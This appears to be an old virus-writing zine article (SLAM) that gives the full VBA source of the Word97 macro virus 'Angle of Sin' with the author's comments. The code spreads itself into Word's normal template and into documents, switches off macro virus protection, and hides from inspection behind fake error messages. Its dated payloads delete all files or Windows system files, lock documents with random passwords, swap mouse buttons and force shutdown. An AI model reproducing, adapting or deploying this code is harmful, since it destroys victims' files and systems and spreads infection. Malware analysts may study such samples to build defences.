Copy Link
Add to Bookmark
Report
SLAM4.027: Word97Macro.Angle of Sin commented by Aurodreph/SLAM
-----------------------------------------------
Another word97 macro virus : Angle of Sin
,
By <****{=============-
' AuRoDrEpH, the Drow
-----------------------------------------------[ Word97Macro. Angle of Sin ]**********************************
˛ VIRUS NAME: ANGLE OF SIN
˛ SIZE: Varies
˛ ORIGIN: SiNer
˛ AUTHOR: Unknown
˛ Total macros 14
->Polymorphism No
->Self Modifying No
->Stealth Yes
->Encrypted No
->Retro No
->Word Version Windows
->Destructive Yes (delete "*.*" on 25th of December, ...)
****************************************************************
After a simple virus, here is a better one, more complex.
Use all the macro possibilities to infect and destroy your system (13 actions from autoopen to send mail).
note: _ indicates continue in the same line
Attribute VB_Name = "AngleOfSin"
Private Declare Function SwapMouseButton Lib "user32" _
(ByVal bSwap As Long) As Long
Private Declare Function ExitWindows Lib "user32" _
(ByVal dwReserved As Long, ByVal uReturnCode As Long) As Long
Private Declare Function ExitWindowsEx Lib "user32" _
(ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Sub AutoOpen()
Infect
Infect2
PayLoad
End Sub
Sub AutoClose()
'When you close the document, the virus infects your system, _
'exits Win95 and you can't do nothing.
On Error GoTo sin
Infect
Infect2
ActiveDocument.Save
PayLoad
MsgBox "Do Not Close This Document. System Unstable", , _
"Warning System Unstable. Please Contact Vendor"
ExitWindowsEx 2, ffffffff
sin:
End Sub
Sub FileSaveAs()
On Error GoTo sin
Dialogs(wdDialogFileSaveAs).Show
PayLoad
Infect
Infect2
sin:
End Sub
Sub FileSave()
On Error GoTo sin
PayLoad
Infect
Infect2
ActiveDocument.Save
SwapMouseButton &H2 _
' this invers the rigth and left buttons of your mouse. Stupid !
sin:
End Sub
Sub AutoNew()
On Error GoTo sin
PayLoad
Infect
Infect2
sin:
End Sub
Sub FilePrint()
On Error GoTo sin
PayLoad
MsgBox " Printing Error at Printer Port:089C", , "Printing Error"
MsgBox " Printing Error Reslo"
Dialogs(wdDialogFilePrint).Show
Infect
Infect2
sin:
End Sub
Sub ToolsMacro()
'protection to avoid the study of macros...
On Error GoTo sin
PayLoad
MsgBox "Insufficent Memory, Stack Error at CS:1000", , _
"Memory Allocation Error"
Infect
Infect2
sin:
End Sub
Sub FileTemplates()
On Error GoTo sin
PayLoad
Infect
Infect2
MsgBox "Insufficent Memory", , "Insufficent Memory"
MsgBox "Please Close More Programs to Free Up Disk Space And Try Again", , _
"Retry Later"
sin:
End Sub
Sub PayLoad()
'here is the payload number 1 :
' * deletes all the files when the date is 25/12
On Error GoTo sin
If Day((Now) = 25) And Month((Now) = 12) Then
ChDir "\"
Kill "*.*"
End If
' * deletes some inportants files when the date is 09/02
If Day((Now) = 9) And Month((Now) = 2) Then
Kill "*.doc"
Kill "c:\command.com"
Kill "c:\autoexec.bat"
Kill "c:\config.sys"
Kill "c:\windows\*.*"
End If
'put a password (saves in a file saos.dll) when the date is a multiple of 5
If Day((Now) = 5) Or Day((Now) = 10) Or Day((Now) = 15) Or Day((Now) = 20) _
Or Day((Now) = 25) Or Day((Now) = 30) Then
Dim x, y, z, a, b, c, d
x = Rnd * 255: y = Rnd * 255: z = Rnd * 255: a = Rnd * 255: b = Rnd * 255: _
c = Rnd * 255: d = Rnd * 255
ActiveDocument.Password = "Angle_Of_Sin" & a & b & c & d & x & y & z
Open "c:\windows\system\saos.dll" For Append As #1
Write #1, x, y, z, a, b, c, d, "File", ActiveDocument.Name
Close #1
End If
sin:
End Sub
Sub EditFind()
On Error GoTo sin:
PayLoad
Infect
Infect2
SwapMouseButton &H4
sin:
End Sub
Sub ToolsWordCount()
On Error GoTo sin
Dialogs(wdDialogToolsWordCount).Show
Infect
Infect2
SwapMouseButton &H4
sin:
End Sub
Sub viewVBcode()
On Error GoTo sin
MsgBox "Invalid Memory Segment:CS:1900", , "Memory Allocation Error"
Infect
Infect2
sin:
End Sub
Sub Infect()
'this sub-routine infects the NORMAL.DOT. The infection routine uses
'the Organizer.
On Error GoTo sin
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Angle:
Options.VirusProtection = False
Application.UserName = "Angle Of Sin"
Application.UserInitials = "SiNeR"
Application.UserAddress = "6667 Angle Rd, Heaven S.I.N"
Options.BackgroundSave = False
Options.CreateBackup = False
Options.SendMailAttach = True
Set ActiveDoc = ActiveDocument
Set GlobalDoc = NormalTemplate
GlobalInstalled = False
'test if the virus is still installed
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "AngelOfSin" Then
DocumentInstalled = True
End If
Next
For a = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(a).Name = "AngleOfSin" Then
GloabalInstalled = True
End If
Next
If GlobalInstalled = False Then
Application.OrganizerCopy Source:=ActiveDocument.Name, _
Destination:=NormalTemplate.Name, Name:="AngleOfSin", _
Object:=wdOrganizerObjectProjectItems
Options.SaveNormalPrompt = False
End If
sin:
End Sub
Sub Infect2()
'this sub-routine infects your document.
On Error GoTo sin
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Angle:
Options.VirusProtection = False
Application.UserName = "Angle Of Sin"
Application.UserInitials = "SiNeR"
Application.UserAddress = "6667 Angle Rd, Heaven S.I.N"
Options.BackgroundSave = False
Options.CreateBackup = False
Options.SendMailAttach = True
DocumentInstalled = False
Set ActiveDoc = ActiveDocument
Set GlobalDoc = NormalTemplate
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "AngelOfSin" Then
DocumentInstalled = True
End If
Next
If NormalInstalled = False Then
Application.OrganizerCopy Source:=NormalTemplate.Name, _
Destination:=ActiveDocument.Name, Name:="AngleOfSin", _
Object:=wdOrganizerObjectProjectItems
ActiveDocument.SaveAs FileName:=ActiveDocument.Name, _
FileFormat:=wdFormalTemplate
End If
sin:
End Sub
Sub SendMail()
On Error GoTo sin
Infect
Infect2
sin:
End Sub
